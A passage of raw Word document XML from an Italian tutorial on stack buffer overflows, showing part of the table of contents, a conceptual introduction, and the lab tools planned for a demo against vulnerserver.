              <w:instrText xml:space="preserve"> PAGEREF _Toc76047778 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="404103DF" w14:textId="600EC7F3" w:rsidR="003441B6" w:rsidRDefault="003441B6">
          <w:pPr>
            <w:pStyle w:val="Sommario2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc76047779" w:history="1">
            <w:r w:rsidRPr="006D3492">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.4 Difesa a livello di sistema operativo</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc76047779 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="193E5FE6" w14:textId="152BFC9A" w:rsidR="003441B6" w:rsidRDefault="003441B6">
          <w:pPr>
            <w:pStyle w:val="Sommario1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc76047780" w:history="1">
            <w:r w:rsidRPr="006D3492">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6. Conclusioni</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc76047780 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="08F1C4E3" w14:textId="3B26FBC5" w:rsidR="003441B6" w:rsidRDefault="003441B6">
          <w:pPr>
            <w:pStyle w:val="Sommario1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc76047781" w:history="1">
            <w:r w:rsidRPr="006D3492">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7. Fonti utilizzate</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc76047781 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6B7E01E3" w14:textId="3E1AF322" w:rsidR="003441B6" w:rsidRDefault="003441B6">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="6C84D1F2" w14:textId="77777777" w:rsidR="003441B6" w:rsidRDefault="003441B6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="479E991A" w14:textId="6492BDB6" w:rsidR="005F29E3" w:rsidRDefault="00533721" w:rsidP="003441B6">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc76047752"/>
      <w:r w:rsidRPr="003441B6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="004D62CA" w:rsidRPr="003441B6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Introduzione</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="39AF84CB" w14:textId="1D74DC56" w:rsidR="00533721" w:rsidRPr="003441B6" w:rsidRDefault="00751302" w:rsidP="003441B6">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc76047753"/>
      <w:r w:rsidRPr="003441B6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="003441B6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Buffer Overflow</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="27359753" w14:textId="0ACA52C4" w:rsidR="00751302" w:rsidRDefault="00751302" w:rsidP="00BF455E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF455E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Il Buffer Overflow (BOF) è una condizione di errore che si verifica a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BF455E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>runtime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BF455E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> quando in un buffer di una data dimensione vengono scritti dati di dimensione maggiore. </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF455E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Quando, per errore o per malizia, vengono inviati più dati della capienza del buffer destinato a contenerli (che per errore o superficialità non è stato progettato a dovere), i dati </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF455E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="202122"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>extra</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF455E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> vanno a sovrascrivere le variabili interne del programma, o il suo stesso </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:tooltip="Pila (informatica)" w:history="1">
        <w:r w:rsidRPr="00BF455E">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:rFonts w:cstheme="minorHAnsi"/>
            <w:color w:val="0645AD"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>stack</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BF455E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>; come conseguenza di ciò, a seconda di cosa è stato sovrascritto e con quali valori, il programma può dare risultati errati o imprevedibili, bloccarsi, o (se è un driver di sistema o lo stesso sistema operativo) bloccare il </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF455E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>computer.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF455E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Conoscendo molto bene il programma in questione, il sistema operativo e il tipo di computer su cui gira, si può precalcolare una serie di dati </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF455E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="202122"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>malevoli</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF455E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> che inviati per provocare un buffer overflow consenta ad un malintenzionato di prendere il controllo del programma (e a volte, tramite questo, dell'intero computer).</w:t>
      </w:r>
      <w:r w:rsidR="00BF455E" w:rsidRPr="00BF455E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Non tutti i programmi sono vulnerabili a questo tipo di inconveniente. Per i linguaggi di basso livello, come l’assembly, i dati sono semplici array di byte, memorizzati in registri o in memoria centrale: la corretta interpretazione di questi dati (indirizzi, interi, caratteri, istruzioni, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BF455E" w:rsidRPr="00BF455E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ecc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BF455E" w:rsidRPr="00BF455E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>…) è affidata alle funzioni e alle istruzioni che li accedono e manipolano; utilizzando linguaggi di basso livello si ha dunque un maggiore controllo delle risorse della macchina, ma è richiesta una maggiore attenzione in fase di programmazione in modo da assicurare l’integrità dei dati (e quindi evitare fenomeni come il buffer overflow). I linguaggi di più alto livello, come il Java e il Python (e molti altri), che definiscono invece il concetto di tipo di una variabile e che definiscono un insieme di operazioni permesse a seconda del tipo, non soffrono di vulnerabilità come il buffer overflow, perché non consentono di memorizzare in un buffer una quantità maggiore di dati rispetto alla sua dimensione. Fra questi due estremi si trova il linguaggio C che presenta alcune delle astrazioni tipiche dei linguaggi di alto livello insieme a elementi tipici dei linguaggi di basso livello, come la possibilità di accedere e manipolare indirizzi di memoria: ciò rende il linguaggio suscettibile ad usi inappropriati della memoria; se a questo si unisce il fatto che alcune librerie di funzioni molto diffuse (in particolare per l’input e la manipolazione di stringhe come la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BF455E" w:rsidRPr="00BF455E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="202122"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>gets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BF455E" w:rsidRPr="00BF455E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>) non effettuano un corretto controllo della dimensione dei buffer su cui lavorano, e che il C è stato usato negli anni ’70 per scrivere il sistema operativo UNIX (e da questo sono poi derivati i sistemi come Linux) e molte delle applicazioni pensate per eseguire su di esso, ne consegue che ancora oggi è presente e circola una grande quantità di codice vulnerabile al buffer overflow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B685B0" w14:textId="2F4F1F2B" w:rsidR="00BF455E" w:rsidRPr="003441B6" w:rsidRDefault="00BF455E" w:rsidP="003441B6">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc76047754"/>
      <w:r w:rsidRPr="003441B6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="003441B6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Cosa vedremo</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="096B7357" w14:textId="79D86823" w:rsidR="00BF455E" w:rsidRDefault="00980488" w:rsidP="00BF455E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Nel capitolo successivo verrà mostrata ciò che è l’anatomia della memoria e dello stack in un software, così da capire per bene le parti di memoria che sarà di nostro interesse. Nella </w:t>
      </w:r>
      <w:r w:rsidRPr="00980488">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="202122"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>demo</w:t>
      </w:r>
      <w:r w:rsidR="00BF455E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> vedremo un esempio di attacco di </w:t>
      </w:r>
      <w:r w:rsidR="00453887">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>BOF</w:t>
      </w:r>
      <w:r w:rsidR="00BF455E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>, utilizzando dei tools appositi</w:t>
      </w:r>
      <w:r w:rsidR="00453887">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> che, alla fine, permetteranno il controllo della shell del computer vittima. Infine, lo scopo sarà anche quello di dimostrare come difendersi da questo tipo di attacco, utilizzando strategie diverse. Nella guida saranno illustrati anche termini specifici utilizzati in questo ambito.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEB07F7" w14:textId="3410B40A" w:rsidR="00453887" w:rsidRPr="003441B6" w:rsidRDefault="00453887" w:rsidP="003441B6">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc76047755"/>
      <w:r w:rsidRPr="003441B6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.3 </w:t>
      </w:r>
      <w:r w:rsidRPr="003441B6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tools utilizzati</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="7FD7AEC8" w14:textId="16B61EAB" w:rsidR="00453887" w:rsidRDefault="00453887" w:rsidP="00453887">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Per la dimostrazione si farà uso di:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C33A45" w14:textId="3D1A264A" w:rsidR="00453887" w:rsidRDefault="009423A4" w:rsidP="00453887">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Computer vittima: Windows 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3BB9A1" w14:textId="1825288E" w:rsidR="009423A4" w:rsidRDefault="009423A4" w:rsidP="00453887">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Computer attaccante: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Linux 2021.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64918143" w14:textId="6E08DC00" w:rsidR="009423A4" w:rsidRDefault="009423A4" w:rsidP="00453887">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Software vulnerabile: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>vulnserver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="64ECD87F" w14:textId="680B19A8" w:rsidR="009423A4" w:rsidRDefault="009423A4" w:rsidP="00453887">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Debugger: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Immunity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Debugger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE41DD2" w14:textId="2E2C73D6" w:rsidR="009423A4" w:rsidRDefault="009423A4" w:rsidP="00453887">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Script: Diversi script in Python e Ruby</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6494FB" w14:textId="77777777" w:rsidR="009423A4" w:rsidRDefault="009423A4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FC5F9C" w14:textId="124CD795" w:rsidR="00980488" w:rsidRPr="003441B6" w:rsidRDefault="00980488" w:rsidP="003441B6">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc76047756"/>
      <w:r w:rsidRPr="003441B6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2. Memoria e Stack</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="5B09D0DA" w14:textId="1602154C" w:rsidR="00980488" w:rsidRPr="003441B6" w:rsidRDefault="00980488" w:rsidP="003441B6">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc76047757"/>
      <w:r w:rsidRPr="003441B6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="003441B6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
